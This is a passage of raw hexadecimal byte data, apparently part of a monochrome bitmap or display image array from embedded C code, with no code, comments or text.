0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X80,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X03,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XC0,
0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,0XC0,0X0F,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X80,
0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XE0,0X07,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X00,
0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X80,
0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0X80,0X07,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X00,
0X01,0XFF,0XFF,0XFF,0XF0,0X7F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X9F,0XFF,0XFE,0X0F,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X80,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,0XFF,0X00,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0XFF,0XFF,0XFF,0X80,0X1F,0XC0,0X1F,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X07,0XFF,0XFE,0X0F,0XFF,0XFC,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X80,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,0XFC,0X00,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X7F,0XFF,0XFF,0X00,0X1F,0X80,0X0F,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X03,0XFF,0XFE,0X0F,0XFF,0XF8,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XF0,0X00,0X07,0XFF,0XFF,0XF8,0X00,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X01,
0X80,0X3F,0XFF,0XFF,0X0F,0X0F,0X07,0X0F,0XFC,0X7F,0XFF,0XF0,0X06,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X01,0XFF,0XFE,0X1F,0XFF,0XF0,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X00,
0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XC0,0X00,0X07,0XFF,0XFF,0XF0,0X00,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X01,
0XC0,0X0F,0XFF,0XFE,0X1F,0X8F,0X0F,0X87,0XFC,0X7F,0XFF,0XC0,0X0E,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X80,0XFF,0XFF,0X3F,0XFF,0XE0,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0X00,
0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X07,0XFF,0XFF,0XE0,0X00,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XE0,0X07,0XFF,0XFE,0X1F,0X87,0X1F,0XC7,0XFC,0X7F,0XFF,0X80,0X1E,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC0,0X7F,0XFF,0XFF,0XFF,0XC0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X01,
0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFE,0X00,0X00,0X07,0XFF,0XFF,0XE0,0X07,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XF0,0X03,0XFF,0XFE,0X1F,0X87,0X1F,0XC7,0XFC,0X7F,0XFF,0X00,0X7E,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XE0,0X3F,0XFF,0XFF,0XFF,0X80,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X01,
0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X10,0X07,0XFF,0XFF,0XC0,0X0F,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XF8,0X01,0XFF,0XFE,0X1F,0X87,0X1F,0XC7,0XFC,0X7F,0XFE,0X00,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF0,0X1F,0XFF,0XFF,0XFF,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFE,0X01,
0X00,0X7F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XFF,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X30,0X07,0XFF,0XFF,0X80,0X1F,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFE,0X00,0X7F,0XFE,0X0F,0X87,0X0F,0X87,0XFC,0X7F,0XF8,0X01,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFC,0X07,0XFE,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X03,
0X80,0X7F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XFC,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0X80,0XF0,0X07,0XFF,0XFF,0X80,0X3F,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0X00,0X3F,0XFF,0X00,0X07,0X00,0X07,0X00,0X03,0XF0,0X03,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X0F,0XC0,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X0F,0XFF,0XFE,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X03,
0X80,0X7F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XF8,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0X83,0XF0,0X07,0XFF,0XFF,0X80,0X7F,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0X80,0X1F,0XFF,0X80,0X07,0X80,0X07,0X00,0X03,0XE0,0X07,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X1F,0X00,0X00,0X3E,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XC0,0X03,0XFF,0XFE,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X03,
0X80,0X3F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XF0,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0X8F,0XF0,0X07,0XFF,0XFF,0X00,0X7F,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XC0,0X0F,0XFF,0XE0,0X87,0XE0,0XC7,0X00,0X03,0XC0,0X0F,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X3E,0X00,0X00,0X0F,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0X00,0X01,0XFF,0XFE,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X07,
0X80,0X3F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XE0,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XDF,0XF0,0X07,0XFF,0XFF,0X00,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XF0,0X07,0XFF,0XFF,0X8F,0XFF,0XC7,0XFC,0X7F,0X80,0X3F,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,
0X00,0X00,0XFF,0XFE,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF8,0X07,
0XC0,0X3F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XE0,0X0F,0XC0,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFF,0X00,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XF8,0X01,0XFF,0XFF,0X8F,0XFF,0X87,0XFC,0X7E,0X00,0X7F,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,
0X00,0X00,0X7F,0XFE,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF8,0X07,
0XC0,0X1F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XC0,0X1F,0XF0,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFC,0X00,0XFF,0XFF,0X0F,0XFF,0X0F,0XFC,0X7C,0X00,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,
0X0F,0XE0,0X7F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF8,0X07,
0XC0,0X1F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XC0,0X3F,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XF8,0X07,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFE,0X00,0X7F,0XFE,0X1F,0XFE,0X0F,0XFC,0X78,0X01,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,
0X3F,0XF0,0X3F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF0,0X0F,
0XC0,0X1F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X80,0X00,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0X80,0X3F,0X00,0X3F,0X80,0X1F,0XFC,0X70,0X07,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,
0X7F,0XF8,0X3F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF0,0X0F,
0XE0,0X1F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X00,0X00,0X3F,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XC0,0X0F,0X00,0X7F,0X80,0X3F,0XFC,0X40,0X0F,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X3F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF0,0X0F,
0XE0,0X0F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XFC,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X00,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XE0,0X07,0X03,0XFF,0X81,0XFF,0XFF,0X80,0X1F,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X3F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XF0,0X0F,
0XE0,0X0F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XFC,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X00,0X00,0X07,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XF0,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X3F,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFC,0X1F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XE0,0X1F,
0XF0,0X0F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XFC,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X00,0X00,0X07,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFC,0X01,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFC,0X1F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XE0,0X1F,
0XF0,0X07,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,
